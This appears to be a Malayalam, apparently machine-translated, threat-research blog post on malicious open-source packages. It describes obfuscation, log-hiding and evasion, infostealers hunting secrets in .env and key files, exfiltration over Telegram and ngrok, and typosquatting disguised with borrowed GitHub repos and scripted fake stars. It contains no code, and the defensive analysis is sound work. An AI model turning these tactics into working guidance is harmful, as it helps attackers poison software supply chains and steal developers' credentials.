അവ്യക്തമാക്കൽ ആക്രമണത്തെ മറച്ചേക്കാം, പക്ഷേ ഒരു ഓപ്പൺ സോഴ്സ് ഘടകത്തിലെ കോഡ് അവ്യക്തമാക്കേണ്ടതിന്റെ ആവശ്യകത എന്താണ്? വ്യക്തമായ കാഴ്ചയിൽ നിന്ന് എന്തെങ്കിലും മറയ്ക്കേണ്ടതുണ്ടെന്നതിന് തെളിവുണ്ടോ? ബൗദ്ധിക സ്വത്തവകാശം സംരക്ഷിക്കുന്നതിന് അവ്യക്തമാക്കൽ ഉപയോഗിക്കുന്ന ക്ഷുദ്രകരമല്ലാത്ത പാക്കേജുകളുടെ നിരവധി ഉദാഹരണങ്ങൾ ഞങ്ങൾ കണ്ടെത്തിയിട്ടുണ്ട്, ഇത് "ഓപ്പൺ സോഴ്സ്" എന്നതിന് വിരുദ്ധമാണ്. മാൽവെയറിന്റെ തെളിവായി അവ്യക്തമാക്കൽ ഉപയോഗിക്കാം, പക്ഷേ അത് നിർണായകമല്ല. അവ്യക്തമാക്കൽ ഇല്ലാതാക്കുന്നതും ബുദ്ധിമുട്ടാണ്.
ഒഴിഞ്ഞുമാറല് പ്രതിരോധ നിയന്ത്രണങ്ങളിൽ നിന്ന് ലളിതമായ സാങ്കേതിക വിദ്യകൾ സ്വീകരിക്കുന്നു. ക്ഷുദ്ര കോഡ് പലപ്പോഴും സംരക്ഷിക്കപ്പെടുന്നു ശ്രമിക്കുക … പിടിക്കുക ഏതെങ്കിലും ഒഴിവാക്കലുകൾ അവഗണിക്കുന്ന ബ്ലോക്കുകൾ, അതിനാൽ അസാധാരണമായ പ്രവർത്തനം ലോഗുകളിൽ കാണിക്കില്ല. ഒരു പ്രത്യേക സ്ഥാപനത്തെയോ പരിസ്ഥിതിയെയോ ലക്ഷ്യം വച്ചുള്ള ക്ഷുദ്രവെയർ ഒഴികെ, പരിസ്ഥിതിയുടെ പരിശോധന (ഒരു VM അല്ലെങ്കിൽ കണ്ടെയ്നറിൽ പ്രവർത്തിക്കുന്നത്) അപൂർവമാണ്.
ഇമേജുകളിലും PDF ഫയലുകളിലും ബൈനറികൾ വേഷംമാറി കാണിക്കുന്നത് (ഒരുതരം സ്റ്റെഗനോഗ്രാഫി) കണ്ടെത്തൽ ഒഴിവാക്കാൻ ഉപയോഗിച്ച മറ്റൊരു സാങ്കേതികതയായിരുന്നു.
ഏറ്റവും സാധാരണമായ ദോഷകരമായ ഘടകങ്ങൾ ഇൻഫോസ്റ്റീലറുകളാണ് എന്നതിനാൽ, ഡാറ്റ ശേഖരണം അത്യാവശ്യമാണ്. രഹസ്യങ്ങൾ (പാസ്വേഡുകൾ, ആക്സസ് ടോക്കണുകൾ, API കീകൾ, ക്രിപ്റ്റോഗ്രാഫിക് കീകൾ) ലോഗ് ഫയലുകളിലും, പരിസ്ഥിതി വേരിയബിളുകളിലും, ക്ലിപ്പ്ബോർഡിലും (ബാങ്കിംഗ് ട്രോജനുകളിലും ക്രിപ്റ്റോ സ്റ്റീലറുകളിലും കാണപ്പെടുന്നു) പതിവായി സ്കാൻ ചെയ്യപ്പെടുന്നു. ആന്തരിക ജിറ്റ് റിപ്പോസിറ്ററികൾ ക്ലോൺ ചെയ്യാൻ കഴിയുന്ന ഒരു ഡെവലപ്മെന്റ് നോഡിലാണ് പാക്കേജ് ഇൻസ്റ്റാളേഷൻ പലപ്പോഴും ചെയ്യുന്നത് എന്നതിനാൽ, സോഴ്സ് കോഡ് എക്സ്ഫിൽട്രേഷനും സാധാരണമാണ്. ജിറ്റ് റിപ്പോസിറ്ററികൾക്കായി തിരയുന്നതിനായി ഡയറക്ടറികൾ എണ്ണുന്ന പാക്കേജുകൾ നമ്മൾ കണ്ടിട്ടുണ്ട്. .env, private.pem, settings.py, app.js, അല്ലെങ്കിൽ application.properties പോലുള്ള സ്ഥലങ്ങൾക്കായി തിരയുന്നത് വളരെ സാധാരണമാണ്.
എക്സ്ഫിൽട്രേഷൻ എന്നത് വ്യാപകമായി വിന്യസിക്കപ്പെട്ട മറ്റൊരു നടപടിയാണ്. ക്ഷുദ്രകരമായ പാക്കേജുകളുടെ ഒരു ന്യൂനപക്ഷം മാത്രമേ എക്സ്ട്രാക്റ്റുചെയ്ത ഡാറ്റയുടെ ലക്ഷ്യസ്ഥാനം മറയ്ക്കാൻ ശ്രമിക്കുന്നുള്ളൂ. ടെലിഗ്രാം ചാനലുകളും എൻഗ്രോക്ക് പോലുള്ള തുരങ്കങ്ങൾ പലപ്പോഴും ഉപയോഗിക്കാറുണ്ട്. കൂടാതെ ധാരാളം ഉണ്ട് സാധാരണയായി വൈറ്റ്ലിസ്റ്റ് ചെയ്ത ഡൊമെയ്നുകൾ എക്സ്ഫിൽട്രേഷനായി ഉപയോഗിക്കുന്നു.
പ്രിവിലേജ് എസ്കലേഷൻ അല്ലെങ്കിൽ ലാറ്ററൽ മൂവ്മെന്റ് പോലുള്ള മറ്റ് സാങ്കേതിക വിദ്യകൾ വളരെ കുറവായിരുന്നു.
ജനപ്രീതിയും വിശ്വാസവും നേടുന്നു
ഒരു റെഡിമെയ്ഡ് കൊലയാളി ദ്രോഹകരമായ വസ്തുവുമായി ഒരു ടെക് വഞ്ചകൻ ഇങ്ങനെ ചോദിക്കുന്നത് സങ്കൽപ്പിക്കുക: "സംശയിക്കാത്ത വിഡ്ഢികൾക്ക് ഈ s#$! കഷണം എങ്ങനെ വിശ്വാസയോഗ്യമാക്കാം?".
അതായത്, ക്ഷുദ്രകരമായ ഘടകത്തിലേക്കുള്ള എൻട്രിയിൽ നിരവധി നക്ഷത്രങ്ങൾ / ഫോർക്കുകൾ (ജനപ്രീതിക്കായി), പതിപ്പുകൾ / പ്രശ്നങ്ങൾ എന്നിവ എങ്ങനെ കാണിക്കാമെന്ന് വിവർത്തനം ചെയ്യുന്നു, കൂടാതെ pull requests (പ്രവർത്തനത്തിനായി). സാങ്കൽപ്പിക പ്രശസ്തിയും (നക്ഷത്രങ്ങൾ) ആശ്രിതരും, പ്രസക്തിയും പരിപാലനവും സംബന്ധിച്ച് ബോധ്യപ്പെടുത്തുന്ന ഒരു കാഴ്ചപ്പാടും നേടുക എന്നതാണ് ആശയം.
ഒരു GitHub പ്രോജക്റ്റിലെ ഉള്ളടക്കങ്ങളും പാക്കേജ് ഉള്ളടക്കങ്ങളും പൊരുത്തപ്പെടുന്നുണ്ടോ എന്ന് രജിസ്ട്രി പരിശോധിക്കുന്നില്ല.. സോഫ്റ്റ്വെയർ വിതരണ ശൃംഖലയിലെ അറിയപ്പെടുന്ന ഒരു പ്രശ്നമാണിത്. പൊതു രജിസ്ട്രികൾ തങ്ങളിലേക്ക് എറിയപ്പെടുന്നതെല്ലാം വിഴുങ്ങുന്ന ഭീമാകാരമായ കുഴികളാണ്. നിങ്ങൾക്ക് ഏത് ശേഖരണവും ലിങ്ക് ചെയ്യാൻ കഴിയും.

ഒരു ജനപ്രിയ പാക്കേജിൽ ഒരു ക്ഷുദ്ര പാക്കേജ് ടൈപ്പിംഗ് പിശക് വരുത്തിയാൽ, അത് എളുപ്പമാണ്: പാക്കേജ് സൃഷ്ടിക്കുന്നതിനും രജിസ്ട്രിയിൽ പ്രസിദ്ധീകരിക്കുന്നതിനും ഉപയോഗിക്കുന്ന ഡിപൻഡൻസി മാനിഫെസ്റ്റിൽ നിലവിലുള്ള GitHub റിപ്പോസിറ്ററി റഫർ ചെയ്യുക. വ്യാജ GitHub റിപ്പോയിലെ പുതിയ പാക്കേജുകൾക്ക്, നിങ്ങൾക്ക് കൂടുതൽ ചാതുര്യം ആവശ്യമായി വന്നേക്കാം, ഒരുപക്ഷേ വ്യാജമായി സൃഷ്ടിക്കുന്നതും. നക്ഷത്ര നിരീക്ഷണം/ഫോർക്കിംഗ് സ്ക്രിപ്റ്റിംഗ് വഴിയുള്ള GitHub അക്കൗണ്ടുകൾ.
നിങ്ങളുടെ പാക്കേജിലെ ഉള്ളടക്കങ്ങൾ repo-യുമായി ന്യായമായും സാമ്യമുള്ളതാണെങ്കിൽ, നന്നായി രൂപകൽപ്പന ചെയ്ത രണ്ട് മാറ്റങ്ങൾ ഇവിടെയും അവിടെയും വരുത്തുക... നിലവിലുള്ളതിന്റെ repo-യെ പരാമർശിക്കുന്ന ഒരു ജനപ്രിയ പാക്കേജിന് സമാനമായ ഒരു പുതിയ പാക്കേജിലേക്ക് നിങ്ങളുടെ മാൽവെയർ കുത്തിവയ്ക്കാം, അക്ഷരത്തെറ്റുകൾക്കായി കാത്തിരിക്കുക. പാക്കേജ് ടാർബോളിന്റെ ഉള്ളടക്കങ്ങൾ GitHub repo-യിലെ ഉള്ളടക്കങ്ങളുമായി താരതമ്യം ചെയ്യാൻ ആരെങ്കിലും ധൈര്യപ്പെട്ടാൽ, malware injection പോയിന്റുകളിലെ വ്യത്യാസങ്ങൾ എളുപ്പത്തിൽ നഷ്ടമാകും. ഈ സമീപനം നമ്മൾ മുമ്പ് പലതവണ കണ്ടിട്ടുണ്ട്.
ഒരു ഘടകത്തിന് അതിന്റെ ഉത്ഭവം, പാക്കേജ് എങ്ങനെ നിർമ്മിച്ചു, ഏതൊക്കെ ഉറവിടങ്ങളിൽ നിന്നാണ്, ആരിൽ നിന്നാണ് സ്വാഗതം ചെയ്യുന്നത് എന്നതിനെക്കുറിച്ച് ഒരു കൃത്രിമ പ്രൂഫ് പ്രസ്താവന നടത്തുന്നതിനുള്ള ഒരു സംവിധാനം. എന്നാൽ അത് മറ്റൊരു കഥയാണ്.
കമ്പോണന്റ് എക്സ് ഒരു മാൽവെയറാണോ?
മാലിഷ്യസ് പാക്കേജുകളുടെ ഒരു (സമഗ്രമായ) ഡാറ്റാബേസ് ഉണ്ടോ? ഇല്ല. ഓപ്പൺ സോഴ്സ് വൾനറബിലിറ്റികൾക്ക് ഒരു CVE ഐഡി നൽകിയിട്ടുണ്ട്, എന്നാൽ കുറച്ച് മാലിഷ്യസ് പാക്കേജുകൾക്ക് (പ്രത്യേകിച്ച് വാർത്തകളിൽ ഇടം നേടുന്നവ) മാത്രമേ അത് നൽകിയിട്ടുള്ളൂ. മാലിഷ്യസ് പാക്കേജുകൾക്കായുള്ള CWE CWE-506 (എംബെഡഡ് മാലിഷ്യസ് കോഡ്).
സാധാരണ മാൽവെയർ ഉപകരണങ്ങൾ (വൈറസ് ടോട്ടൽ, മാൽവെയർ ബസാർ, സോറൽ-20എം…) ദോഷകരമായ ഘടകങ്ങൾക്ക് പ്രത്യേക വ്യവസ്ഥകൾ ഏർപ്പെടുത്തുന്നില്ല. അത് സ്വാഗതാർഹമാണ്!
വിശകലനത്തിനായി ഗവേഷണ സാമ്പിൾ ഡാറ്റാബേസുകളും ഡാറ്റാസെറ്റുകളും ഉണ്ട് (ഞങ്ങൾ അവയിൽ ചിലത് ഉപയോഗിക്കുന്നു), പക്ഷേ ക്ഷുദ്രകരമായ പാക്കേജ് അറിയപ്പെടുമ്പോൾ മാത്രമേ എൻട്രികൾ അപ്ഡേറ്റ് ചെയ്യൂ, അത് പലപ്പോഴും വളരെ വൈകും. നിങ്ങൾക്ക് താൽപ്പര്യമുണ്ടെങ്കിൽ, OpenSSF ദോഷകരമായ പാക്കേജുകൾ നല്ലൊരു തുടക്കമാണ്.
അടുത്ത പോസ്റ്റിൽ, നൽകിയിരിക്കുന്ന ഒരു പാക്കേജ് മാലിഷ്യസ് ആണോ എന്ന് എങ്ങനെ അറിയാമെന്ന് നമ്മൾ ചർച്ച ചെയ്യും. സ്പോയിലർ: അതെ, എക്സ്പോഷർ വിൻഡോയുടെ തുടക്കത്തിൽ തന്നെ, രജിസ്ട്രി അറിയപ്പെടുന്ന മാലിഷ്യസ് ഘടകം നീക്കം ചെയ്യുന്നതിനുമുമ്പ്, മാലിഷ്യസ് ഘടകങ്ങൾ പരിശോധിക്കുന്നതിനുള്ള മാർഗങ്ങളുണ്ട്.
കൂടുതൽ വായനയ്ക്ക്
അടുത്ത എപ്പിസോഡിൽ “ഓപ്പൺ സോഴ്സ് ക്ഷുദ്ര പാക്കേജുകളിൽ നിന്ന് പരിരക്ഷിക്കൽ: എന്താണ് (പ്രവർത്തിക്കുന്നില്ല)" ഓപ്പൺ സോഴ്സ് സുരക്ഷയ്ക്കായി ചെയ്യേണ്ടതും ചെയ്യരുതാത്തതുമായ കാര്യങ്ങളെ കുറിച്ച് നമ്മൾ ചർച്ച ചെയ്യും. ഈ ഭീഷണി എങ്ങനെ കൈകാര്യം ചെയ്യണമെന്നതിനെക്കുറിച്ച് സുരക്ഷാ അവബോധമുള്ള മിക്ക പ്രൊഫഷണലുകൾക്കും അവബോധമുണ്ട്, പക്ഷേ തെറ്റിദ്ധാരണകൾ പെരുകുന്നു.
ഈ ആശയങ്ങൾ എന്തുകൊണ്ട് തെറ്റാണെന്നും അത്തരം തെറ്റിദ്ധാരണകൾ ഈ ആക്രമണ സംവിധാനത്തിന്റെ ജനപ്രീതിക്കും സംഘടനകൾ നേരിടുന്ന അമിതമായ അപകടസാധ്യതയ്ക്കും എങ്ങനെ സംഭാവന നൽകുന്നുവെന്നും ഞങ്ങൾ അവലോകനം ചെയ്യും. തുടർന്ന് എന്താണ് പ്രവർത്തിക്കുന്നത്, അതിൽ ഉൾപ്പെട്ടിരിക്കുന്ന പരിശ്രമവും വിഭവങ്ങളും ഏതാണ് എന്നതിനെക്കുറിച്ച് ഞങ്ങൾ മുന്നോട്ട് പോകും.
കൂടാതെ, ക്ഷുദ്ര പാക്കേജുകളുടെ പരിണാമത്തെക്കുറിച്ചും അവയുടെ ഉദ്ദേശ്യം, കുത്തിവയ്പ്പ് സംവിധാനം, ആക്രമണ രീതികൾ എന്നിവയെക്കുറിച്ചും ഞങ്ങൾ പോസ്റ്റ് ചെയ്യാൻ പോകുന്നു.
ഇവിടെത്തന്നെ നിൽക്കുക!






